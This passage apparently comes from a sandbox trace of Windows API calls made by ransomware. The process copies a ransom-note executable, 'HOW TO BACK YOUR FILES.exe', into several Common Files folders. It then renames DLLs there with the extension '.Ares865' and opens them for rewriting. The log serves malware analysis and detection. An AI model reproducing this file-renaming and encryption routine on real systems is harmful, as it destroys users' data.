hTemplateFile=0x0) returned 0x118 [0151.769] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19784) returned 1 [0151.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0151.773] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036" [0151.773] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0151.774] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0151.774] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036") returned 62 [0151.774] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036" [0151.774] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.774] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.774] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.775] GetLastError () returned 0x0 [0151.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.775] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.775] CloseHandle (hObject=0x120) returned 1 [0151.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.775] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.775] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53851900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53851900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.775] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.775] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.776] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.776] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.776] lstrlenW (lpString="Ares865") returned 7 [0151.776] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.Ares865") returned 81 [0151.776] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.777] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.777] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19784) returned 1 [0151.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.782] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033" [0151.782] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0151.782] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0151.782] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033") returned 62 [0151.782] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033" [0151.782] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.782] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.783] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.784] GetLastError () returned 0x0 [0151.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.784] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.784] CloseHandle (hObject=0x120) returned 1 [0151.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.784] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.784] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53877a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53877a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.784] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.784] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.784] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.784] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.784] lstrlenW (lpString="Ares865") returned 7 [0151.785] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.Ares865") returned 81 [0151.785] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.786] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.786] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17736) returned 1 [0151.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.791] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031" [0151.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0151.791] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031") returned 62 [0151.791] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031" [0151.791] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.791] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.792] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.792] GetLastError () returned 0x0 [0151.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.792] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.792] CloseHandle (hObject=0x120) returned 1 [0151.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.792] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.792] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53877a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53877a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.793] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.793] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.793] lstrlenW (lpString="Ares865") returned 7 [0151.793] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.793] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.Ares865") returned 81 [0151.793] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.794] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.795] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20288) returned 1 [0151.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0151.804] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028" [0151.804] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0151.804] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7948 | out: hHeap=0x2b0000) returned 1 [0151.804] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028") returned 62 [0151.804] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028" [0151.804] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.804] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.805] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.805] GetLastError () returned 0x0 [0151.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.805] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.805] CloseHandle (hObject=0x120) returned 1 [0151.805] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.805] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5389dbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5389dbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.806] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.806] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.806] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.806] lstrlenW (lpString="Ares865") returned 7 [0151.806] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.806] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.Ares865") returned 81 [0151.806] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.808] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.808] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13120) returned 1 [0151.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0151.811] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO" [0151.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0151.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7928 | out: hHeap=0x2b0000) returned 1 [0151.811] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO") returned 56 [0151.811] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO" [0151.811] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.812] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.812] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.813] GetLastError () returned 0x0 [0151.813] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.813] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.813] CloseHandle (hObject=0x120) returned 1 [0151.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.813] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.813] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5389dbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5389dbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.813] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.813] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.813] lstrcpyW (in: lpString1=0x2cce472, lpString2="dao360.dll" | out: lpString1="dao360.dll") returned="dao360.dll" [0151.813] lstrlenW (lpString="dao360.dll") returned 10 [0151.814] lstrlenW (lpString="Ares865") returned 7 [0151.814] lstrcmpiW (lpString1="360.dll", lpString2="Ares865") returned -1 [0151.814] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll.Ares865") returned 75 [0151.814] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll.ares865"), dwFlags=0x1) returned 1 [0151.815] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=610304) returned 1 [0151.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0151.848] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Java", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java") returned="C:\\Program Files (x86)\\Common Files\\Java" [0151.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0151.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7908 | out: hHeap=0x2b0000) returned 1 [0151.848] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Java") returned 40 [0151.848] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Java" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java") returned="C:\\Program Files (x86)\\Common Files\\Java" [0151.848] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.848] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.849] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.850] GetLastError () returned 0x0 [0151.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.850] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.850] CloseHandle 